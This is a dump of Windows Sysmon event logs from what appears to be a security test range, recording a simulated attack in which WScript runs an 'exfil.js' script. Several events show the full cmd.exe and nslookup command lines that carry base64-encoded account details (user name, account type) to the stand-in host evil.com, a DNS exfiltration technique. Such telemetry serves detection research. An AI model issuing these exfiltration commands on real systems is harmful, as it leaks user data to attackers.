14:21:26.704{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlafn.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.689{2E1864BB-18E6-629A-E642-000000005F02}27927656C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-E742-000000005F02}6408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.689{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.689{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.673{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.673{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E742-000000005F02}6408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.673{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.673{2E1864BB-18E6-629A-E542-000000005F02}13447900C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-E742-000000005F02}6408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.688{2E1864BB-18E6-629A-E742-000000005F02}6408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-E542-000000005F02}1344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlafn.tmp 2>&1 10341000x8000000000000000207109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.673{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E642-000000005F02}2792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.672{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E642-000000005F02}2792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.667{2E1864BB-18E6-629A-E642-000000005F02}27927656C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-E542-000000005F02}1344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000207106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.651{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=002F4CF2DCECE614CE5562E59B993F36,SHA256=38294D5DE83B987FB760A1C1D90794823B63F5FFE861D2E19BCCA0AC4272BA21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.651{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E642-000000005F02}2792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.635{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E542-000000005F02}1344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.635{2E1864BB-18E0-629A-6742-000000005F02}39766508C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-E542-000000005F02}1344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.646{2E1864BB-18E6-629A-E542-000000005F02}1344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlafn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.635{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxo.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.620{2E1864BB-18E6-629A-E342-000000005F02}77924192C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-E442-000000005F02}7380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.604{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.604{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.604{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.604{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.604{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E442-000000005F02}7380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.604{2E1864BB-18E6-629A-E242-000000005F02}7327452C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-E442-000000005F02}7380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.618{2E1864BB-18E6-629A-E442-000000005F02}7380C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-E242-000000005F02}732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxo.tmp 2>&1 10341000x8000000000000000207088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.589{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E342-000000005F02}7792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.589{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E342-000000005F02}7792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.573{2E1864BB-18E6-629A-E342-000000005F02}77924192C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-E242-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 